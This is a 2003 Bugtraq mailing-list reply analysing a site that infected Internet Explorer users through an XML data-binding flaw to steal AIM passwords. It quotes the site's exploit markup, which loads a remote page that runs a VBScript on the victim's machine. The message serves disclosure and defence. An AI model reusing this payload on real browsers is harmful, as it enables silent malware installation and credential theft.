[31733] in bugtraq
RE: [Fwd: Re: AIM Password theft]
daemon@ATHENA.MIT.EDU (S G Masood)
Wed Sep 24 12:14:27 2003
Message-ID: <20030923225023.19769.qmail@web11008.mail.yahoo.com>
Date: Tue, 23 Sep 2003 15:50:23 -0700 (PDT)
From: S G Masood <sgmasood@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Hi Mark,
www.Haxr.org uses the "XML Page Object Type Validation
Vulnerability" [1] to infect IE users automatically.
Here is the code from the site:
<span datasrc="#oExec" datafld="counter"
dataformatas="html"></span>
<xml id="oExec">
<security>
<counter>
<![CDATA[
<object data=tracker.php></object>
]]>
</counter>
</security>
</xml>
This is almost an exact copy of the PoC exploit posted
for this vuln.
tracker.php points to the exec.vbs script that you
posted. This finally gets executed on the victim
machine and does its stuff.
>If this is new, its going to spread like wildfire.
It will infect many machines but IMO, it wouldn't
exactly spread like "wildfire" 'coz it has a "single
point of failure". Have you considered complaining to
the hosting service of www.haxr.org?
--
Regards,
S.G.Masood
Hyderabad,
India
--
__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
